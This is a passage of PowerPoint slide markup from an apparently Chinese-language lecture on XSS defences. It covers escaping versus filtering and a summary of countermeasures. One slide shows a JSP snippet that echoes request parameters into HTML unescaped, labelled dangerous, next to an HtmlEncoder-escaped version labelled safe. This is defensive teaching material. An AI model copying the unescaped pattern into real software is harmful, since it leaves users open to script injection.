            <a:ext cx="8534400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>综合起来有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>91</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>十多种编码方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数种对象类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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7538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞：转义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="32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00063" y="1143000"/>
          <a:ext cx="7643812" cy="1785938"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7643812"/>
              </a:tblGrid>
              <a:tr h="1785938">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>String title = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>request.getParameter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“title”);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>String id = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>request.getParameter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“id”);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>….</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;span&gt; &lt;%=title%&gt;&lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;span&gt; &lt;%=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>contect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>%&gt;&lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="表格 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="539552" y="3286125"/>
          <a:ext cx="7604323" cy="3090863"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7604323"/>
              </a:tblGrid>
              <a:tr h="3090863">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>String title = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>request.getParameter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“title”);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>String id = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>request.getParameter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“id”);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>….</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;span&gt; &lt;%=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xss.HtmlEncoder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>title,”HTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>”)%&gt;&lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr eaLnBrk="1" hangingPunct="1">
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;span&gt; &lt;%=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>xss.HtmlEncoder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>contect,”HTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>”)%&gt;&lt;/span&gt;</a:t>
                      </a:r>
                    </a:p>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r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>把输入的值转义</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800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>对策：转义比过滤更好</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51215" name="Oval 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="4143375"/>
            <a:ext cx="1143000" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00CC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安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51216" name="Oval 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6929438" y="1428750"/>
            <a:ext cx="1143000" cy="68580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危险</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="388938" y="908720"/>
            <a:ext cx="7696200" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:scheme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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="388938" y="3051845"/>
            <a:ext cx="7696200" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:scheme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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="388938" y="4194845"/>
            <a:ext cx="7696200" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:scheme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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="465138" y="5337845"/>
            <a:ext cx="7696200" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:scheme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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52230" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防范措施总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153607" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617538" y="908720"/>
            <a:ext cx="8686800" cy="1479550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>过滤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>有时候过滤会导致意外的结果，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>alice’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>变成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>alices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>有时候需要多次过滤，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
